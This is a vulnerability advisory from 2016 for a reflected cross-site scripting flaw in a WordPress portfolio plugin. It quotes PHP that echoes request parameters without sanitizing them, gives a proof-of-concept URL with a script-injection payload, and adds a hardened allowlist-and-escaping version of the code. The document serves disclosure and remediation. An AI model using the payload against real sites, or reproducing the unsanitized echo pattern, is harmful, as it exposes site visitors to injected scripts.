Advisory #: 359
Title: Reflected XSS in WordPress plugin simple-behace-portfolio v0.2
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/simple-behace-portfolio
Downloads: 1680
Vendor Notified: 2016-02-09
Vendor Contact: plugins@wordpress.org
Plugin Name: simple-behace-portfolio
Vulnerability:
There is a reflected XSS vulnerability in the following PHP code in ./simple-behace-portfolio/titan-framework/iframe-font-preview.php:

     99: font-family: <?php echo $_GET['font-family'] ?>;
    100: color: <?php echo $_GET['color'] ?>;
    101: font-size: <?php echo $_GET['font-size'] ?>;
    102: font-weight: <?php echo $_GET['font-weight'] ?>;
    103: font-style: <?php echo $_GET['font-style'] ?>;
    104: line-height: <?php echo $_GET['line-height'] ?>;
    105: letter-spacing: <?php echo $_GET['letter-spacing'] ?>;
    106: text-transform: <?php echo $_GET['text-transform'] ?>;
    107: font-variant: <?php echo $_GET['font-variant'] ?>;
    141: <body class='<?php echo $_GET['dark'] ?>'>

The font-family parameter appears to be sent back to the user's browser unsanitized.
CVE-ID: Not Released
File: ./simple-behace-portfolio/titan-framework/iframe-font-preview.php
Exploit Code:
The exploit was derived from the first vulnerable parameter that appears in the code; there may be more, as shown above.
This is an untested autogenerated exploit:
    http://[target]/wp-content/plugins/simple-behace-portfolio/titan-framework/iframe-font-preview.php?font-family="><script>alert(1);</script><"
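As an added example (not the plugin's or Titan Framework's own code), the following shows how the font-preview output quoted above could be hardened: each $_GET value is validated against an allowlist before use and HTML-escaped on output, so a value can no longer break out of the style declaration or the class attribute. The parameter names and defaults are assumptions for illustration.

```php
<?php
// Added example, not the plugin's code. Hardened version of the font-preview
// output: validate every request parameter against an allowlist, then escape
// it when it is written into the page.

// CSS values: accept only a conservative alphabet (letters, digits, space,
// comma, dot, percent, hash, hyphen). Quotes, angle brackets, semicolons and
// braces are rejected, so a value cannot close the <style> block or inject a
// new declaration. Anything else falls back to the default.
function safe_css_value(string $key, string $default = ''): string {
    if (!isset($_GET[$key]) || !is_string($_GET[$key])) {
        return $default; // missing, or an array such as ?key[]=x
    }
    $value = $_GET[$key];
    if (!preg_match('/^[A-Za-z0-9 ,.%#\-]{1,64}$/', $value)) {
        return $default;
    }
    return $value;
}

// The body class is a fixed choice, so use an exact-match allowlist.
function safe_dark_class(): string {
    $allowed = ['', 'dark'];
    $value = (isset($_GET['dark']) && is_string($_GET['dark'])) ? $_GET['dark'] : '';
    return in_array($value, $allowed, true) ? $value : '';
}

// Output-escaping helper; htmlspecialchars is a second layer on top of the
// allowlist so that even an accepted value is HTML-safe where it lands.
function e(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

$fontFamily = safe_css_value('font-family', 'sans-serif');
$color      = safe_css_value('color', '#000000');
$fontSize   = safe_css_value('font-size', '16px');
$darkClass  = safe_dark_class();
?>
<style>
body {
    font-family: <?php echo e($fontFamily); ?>;
    color: <?php echo e($color); ?>;
    font-size: <?php echo e($fontSize); ?>;
}
</style>
<body class="<?php echo e($darkClass); ?>">
```

The same pattern applies to the remaining parameters (font-weight, font-style, line-height, letter-spacing, text-transform, font-variant): route each through the allowlist check and the escaping helper rather than echoing $_GET directly.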